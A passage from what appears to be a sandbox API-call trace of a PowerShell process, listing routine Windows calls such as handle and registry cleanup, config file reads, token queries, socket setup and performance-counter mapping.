(hObject=0x47c) returned 1 [0152.491] RegCloseKey (hKey=0x478) returned 0x0 [0152.492] CloseHandle (hObject=0x474) returned 1 [0152.492] RegCloseKey (hKey=0x470) returned 0x0 [0152.493] CloseHandle (hObject=0x46c) returned 1 [0152.493] RegCloseKey (hKey=0x468) returned 0x0 [0152.493] RegCloseKey (hKey=0x464) returned 0x0 [0152.493] CloseHandle (hObject=0x3b4) returned 1 [0152.494] CloseHandle (hObject=0x44c) returned 1 [0152.494] setsockopt (s=0x444, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0152.494] closesocket (s=0x444) returned 0 [0152.495] CloseHandle (hObject=0x448) returned 1 [0152.495] CloseHandle (hObject=0x344) returned 1 [0152.495] setsockopt (s=0x438, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0152.495] closesocket (s=0x438) returned 0 [0152.496] CloseHandle (hObject=0x440) returned 1 [0152.496] CloseHandle (hObject=0x340) returned 1 [0152.496] CloseHandle (hObject=0x33c) returned 1 [0152.496] CloseHandle (hObject=0x338) returned 1 [0152.497] CloseHandle (hObject=0x334) returned 1 [0152.497] CloseHandle (hObject=0x330) returned 1 [0152.497] CloseHandle (hObject=0x320) returned 1 [0152.498] CloseHandle (hObject=0x308) returned 1 [0152.498] CloseHandle (hObject=0x304) returned 1 [0152.498] CloseHandle (hObject=0x394) returned 1 [0152.498] CloseHandle (hObject=0x390) returned 1 [0152.499] CloseHandle (hObject=0x370) returned 1 [0152.499] CloseHandle (hObject=0x3a4) returned 1 [0152.499] CloseHandle (hObject=0x524) returned 1 [0152.499] CloseHandle (hObject=0x4f4) returned 1 [0152.500] CloseHandle (hObject=0x51c) returned 1 [0152.500] CloseHandle (hObject=0x520) returned 1 [0152.500] CloseHandle (hObject=0x57c) returned 1 [0152.501] UnmapViewOfFile (lpBaseAddress=0x2ab0000) returned 1 [0152.502] CloseHandle (hObject=0x328) returned 1 [0152.502] CloseHandle (hObject=0x43c) returned 1 [0152.503] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 [0152.503] CloseHandle (hObject=0x2ec) returned 1 [0152.503] CloseHandle (hObject=0x31c) returned 1 [0152.503] UnmapViewOfFile (lpBaseAddress=0x28a0000) returned 1 Thread: id = 49 os_tid = 0x824 [0138.636] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0138.640] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1c78ef18*=0x39c, lpdwindex=0x1c78ec30 | out: lpdwindex=0x1c78ec30) returned 0x0 [0138.665] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409 [0138.675] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.675] CoTaskMemFree (pv=0x10cff0) [0138.677] VirtualQuery (in: lpAddress=0x1c78db30, lpBuffer=0x1c78e9f0, dwLength=0x30 | out: lpBuffer=0x1c78e9f0*(BaseAddress=0x1c78d000, AllocationBase=0x1be00000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.694] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.694] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.694] CoTaskMemFree (pv=0x10cff0) [0138.698] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.698] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.698] CoTaskMemFree (pv=0x10cff0) [0138.702] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.702] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.702] CoTaskMemFree (pv=0x10cff0) [0138.720] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.720] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.720] CoTaskMemFree (pv=0x10cff0) [0138.723] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.723] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.723] CoTaskMemFree (pv=0x10cff0) [0138.724] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.725] CoTaskMemFree (pv=0x10cff0) [0138.746] VirtualQuery (in: lpAddress=0x1c78dde0, lpBuffer=0x1c78eca0, dwLength=0x30 | out: lpBuffer=0x1c78eca0*(BaseAddress=0x1c78d000, AllocationBase=0x1be00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.747] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.747] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.747] CoTaskMemFree (pv=0x10cff0) [0138.751] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.751] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.751] CoTaskMemFree (pv=0x10cff0) [0138.752] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.752] CoTaskMemFree (pv=0x10cff0) [0138.754] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.754] CoTaskMemFree (pv=0x10cff0) [0138.764] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.764] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.764] CoTaskMemFree (pv=0x10cff0) [0138.896] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.896] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.896] CoTaskMemFree (pv=0x10cff0) [0138.900] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.900] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.900] CoTaskMemFree (pv=0x10cff0) [0138.902] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.903] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.903] CoTaskMemFree (pv=0x10cff0) [0138.907] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.907] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.908] CoTaskMemFree (pv=0x10cff0) [0138.909] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.910] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.910] CoTaskMemFree (pv=0x10cff0) [0138.912] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.912] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.912] CoTaskMemFree (pv=0x10cff0) [0138.915] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.915] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.915] CoTaskMemFree (pv=0x10cff0) [0138.946] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.946] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.946] CoTaskMemFree (pv=0x10cff0) [0138.959] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.959] CoTaskMemFree (pv=0x10cff0) [0139.017] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0139.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.018] CoTaskMemFree (pv=0x10cff0) [0139.034] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0139.034] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.034] CoTaskMemFree (pv=0x10cff0) [0139.041] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0139.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.042] CoTaskMemFree (pv=0x10cff0) [0140.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c78d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0140.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c78d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0140.256] CoTaskMemAlloc (cb=0x20c) returned 0x1b819f30 [0140.256] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b819f30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0140.257] CoTaskMemFree (pv=0x1b819f30) [0140.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c78d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0140.268] GetCurrentProcess () returned 0xffffffffffffffff [0140.268] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d778 | out: TokenHandle=0x1c78d778*=0x3b4) returned 1 [0140.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c78d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30 [0140.271] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c78d820 | out: lpFileInformation=0x1c78d820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x3f871a3e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0140.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c78d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0140.273] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c78d7d0 | out: lpFileInformation=0x1c78d7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x3f871a3e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0140.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c78d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0140.274] SetErrorMode (uMode=0x1) returned 0x1 [0140.274] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3bc [0140.274] GetFileType (hFile=0x3bc) returned 0x1 [0140.274] SetErrorMode (uMode=0x1) returned 0x1 [0140.274] GetFileType (hFile=0x3bc) returned 0x1 [0140.276] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x1c78d7c8 | out: lpFileSizeHigh=0x1c78d7c8*=0x0) returned 0x65b3 [0140.276] ReadFile (in: hFile=0x3bc, lpBuffer=0x2fc09f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c78d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2fc09f0*, lpNumberOfBytesRead=0x1c78d6e8*=0x1000, lpOverlapped=0x0) returned 1 [0140.283] ReadFile (in: hFile=0x3bc, lpBuffer=0x2fc09f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c78d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2fc09f0*, lpNumberOfBytesRead=0x1c78d3c8*=0x1000, lpOverlapped=0x0) returned 1 [0140.283] ReadFile (in: hFile=0x3bc, lpBuffer=0x2fc09f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c78d218, lpOverlapped=0x0 | out: lpBuffer=0x2fc09f0*, lpNumberOfBytesRead=0x1c78d218*=0x1000, lpOverlapped=0x0) returned 1 [0140.284] ReadFile (in: hFile=0x3bc, lpBuffer=0x2fc09f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c78d218, lpOverlapped=0x0 | out: lpBuffer=0x2fc09f0*, lpNumberOfBytesRead=0x1c78d218*=0x1000, lpOverlapped=0x0) returned 1 [0140.481] CloseHandle (hObject=0x3bc) returned 1 [0140.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c78d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0140.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c78d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0140.482] CoTaskMemAlloc (cb=0x20c) returned 0x1b819f30 [0140.482] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b819f30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0140.482] CoTaskMemFree (pv=0x1b819f30) [0140.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c78d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0140.483] GetCurrentProcess () returned 0xffffffffffffffff [0140.483] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d9d8 | out: TokenHandle=0x1c78d9d8*=0x3bc) returned 1 [0140.483] GetCurrentProcess () returned 0xffffffffffffffff [0140.483] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d9d8 | out: TokenHandle=0x1c78d9d8*=0x398) returned 1 [0140.484] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d778 | out: TokenHandle=0x1c78d778*=0x3b8) returned 1 [0140.485] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c78d820 | out: lpFileInformation=0x1c78d820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0140.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c78d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0140.485] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c78d7d0 | out: lpFileInformation=0x1c78d7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0140.485] GetCurrentProcess () returned 0xffffffffffffffff [0140.486] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d9d8 | out: TokenHandle=0x1c78d9d8*=0x3c0) returned 1 [0140.486] GetCurrentProcess () returned 0xffffffffffffffff [0140.486] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d9d8 | out: TokenHandle=0x1c78d9d8*=0x3c4) returned 1 [0140.490] GetCurrentProcess () returned 0xffffffffffffffff [0140.490] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d658 | out: TokenHandle=0x1c78d658*=0x3c8) returned 1 [0140.506] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d658 | out: TokenHandle=0x1c78d658*=0x3cc) returned 1 [0140.518] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3d0 [0140.518] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3d4 [0140.532] GetCurrentProcess () returned 0xffffffffffffffff [0140.532] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d628 | out: TokenHandle=0x1c78d628*=0x3d8) returned 1 [0140.540] GetCurrentProcess () returned 0xffffffffffffffff [0140.540] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d628 | out: TokenHandle=0x1c78d628*=0x3dc) returned 1 [0140.548] GetCurrentProcess () returned 0xffffffffffffffff [0140.548] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d568 | out: TokenHandle=0x1c78d568*=0x3e0) returned 1 [0140.549] GetCurrentProcess () returned 0xffffffffffffffff [0140.549] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d568 | out: TokenHandle=0x1c78d568*=0x3e4) returned 1 [0140.551] GetCurrentProcess () returned 0xffffffffffffffff [0140.551] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78dba8 | out: TokenHandle=0x1c78dba8*=0x3e8) returned 1 [0140.555] CoTaskMemAlloc (cb=0x12) returned 0x1b84a600 [0140.555] RegQueryValueExW (in: hKey=0x3ec, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c78bbbc, lpData=0x1b84a600, lpcbData=0x1c78bbb8*=0xe | out: lpType=0x1c78bbbc*=0x1, lpData="Client", lpcbData=0x1c78bbb8*=0xe) returned 0x0 [0140.555] CoTaskMemFree (pv=0x1b84a600) [0140.555] RegCloseKey (hKey=0x3ec) returned 0x0 [0140.562] CoTaskMemAlloc (cb=0xcd0) returned 0x1b84baf0 [0140.563] RasEnumConnectionsW (in: param_1=0x1b84baf0, param_2=0x1c78dbfc, param_3=0x1c78dbf8 | out: param_1=0x1b84baf0, param_2=0x1c78dbfc, param_3=0x1c78dbf8) returned 0x0 [0140.568] CoTaskMemFree (pv=0x1b84baf0) [0140.578] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c78da08 | out: lpWSAData=0x1c78da08) returned 0 [0140.587] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x430 [0140.591] setsockopt (s=0x430, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0140.591] closesocket (s=0x430) returned 0 [0140.591] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x430 [0140.593] setsockopt (s=0x430, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0140.593] closesocket (s=0x430) returned 0 [0140.595] GetCurrentProcess () returned 0xffffffffffffffff [0140.596] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d288 | out: TokenHandle=0x1c78d288*=0x430) returned 1 [0140.597] GetCurrentProcess () returned 0xffffffffffffffff [0140.597] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d288 | out: TokenHandle=0x1c78d288*=0x434) returned 1 [0140.605] GetCurrentProcessId () returned 0xbf8 [0140.613] CoTaskMemAlloc (cb=0x204) returned 0x14e830 [0140.613] GetComputerNameW (in: lpBuffer=0x14e830, nSize=0x2ea21b0 | out: lpBuffer="AUFDDCNTXWT", nSize=0x2ea21b0) returned 1 [0140.613] CoTaskMemFree (pv=0x14e830) [0140.617] CoTaskMemAlloc (cb=0x20) returned 0x1b84ae80 [0140.617] RegQueryValueExW (in: hKey=0x438, lpValueName="Library", lpReserved=0x0, lpType=0x1c78d6bc, lpData=0x1b84ae80, lpcbData=0x1c78d6b8*=0x1c | out: lpType=0x1c78d6bc*=0x1, lpData="netfxperf.dll", lpcbData=0x1c78d6b8*=0x1c) returned 0x0 [0140.617] CoTaskMemFree (pv=0x1b84ae80) [0140.617] RegQueryValueExW (in: hKey=0x438, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c78d6ec, lpData=0x0, lpcbData=0x1c78d6e8*=0x0 | out: lpType=0x1c78d6ec*=0x4, lpData=0x0, lpcbData=0x1c78d6e8*=0x4) returned 0x0 [0140.618] RegQueryValueExW (in: hKey=0x438, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c78d6f0, lpData=0x1c78d6ec, lpcbData=0x1c78d6e8*=0x4 | out: lpType=0x1c78d6f0*=0x4, lpData=0x1c78d6ec*=0x1, lpcbData=0x1c78d6e8*=0x4) returned 0x0 [0140.618] RegQueryValueExW (in: hKey=0x438, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c78d6ec, lpData=0x0, lpcbData=0x1c78d6e8*=0x0 | out: lpType=0x1c78d6ec*=0x4, lpData=0x0, lpcbData=0x1c78d6e8*=0x4) returned 0x0 [0140.618] RegQueryValueExW (in: hKey=0x438, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c78d6f0, lpData=0x1c78d6ec, lpcbData=0x1c78d6e8*=0x4 | out: lpType=0x1c78d6f0*=0x4, lpData=0x1c78d6ec*=0x137a, lpcbData=0x1c78d6e8*=0x4) returned 0x0 [0140.623] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0140.641] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c78d660, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x43c [0140.643] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2ab0000 [0140.648] VirtualQuery (in: lpAddress=0x2ab0000, lpBuffer=0x1c78d658, dwLength=0x30 | out: lpBuffer=0x1c78d658*(BaseAddress=0x2ab0000, AllocationBase=0x2ab0000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30 [0140.649] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ea6150, cbSid=0x1c78d640 | out: pSid=0x2ea6150*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d640) returned 1 [0140.651] WaitForSingleObject (hHandle=0x438, dwMilliseconds=0x1f4) returned 0x0 [0140.651] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ea6670, cbSid=0x1c78d5a0 | out: pSid=0x2ea6670*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d5a0) returned 1 [0140.652] ReleaseMutex (hMutex=0x440) returned 1 [0140.653] GetProcessTimes (in: hProcess=0x440, lpCreationTime=0x1c78d5b0, lpExitTime=0x1c78d5a8, lpKernelTime=0x1c78d5a0, lpUserTime=0x1c78d598 | out: lpCreationTime=0x1c78d5b0, lpExitTime=0x1c78d5a8, lpKernelTime=0x1c78d5a0, lpUserTime=0x1c78d598) returned 1 [0140.654] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ea7690, cbSid=0x1c78d640 | out: pSid=0x2ea7690*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d640) returned 1 [0140.655] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ea84d0, cbSid=0x1c78d640 | out: pSid=0x2ea84d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d640) returned 1 [0140.655] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ea9308, cbSid=0x1c78d640 | out: pSid=0x2ea9308*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d640) returned 1 [0140.656] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2eaa138, cbSid=0x1c78d640 | out: pSid=0x2eaa138*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, 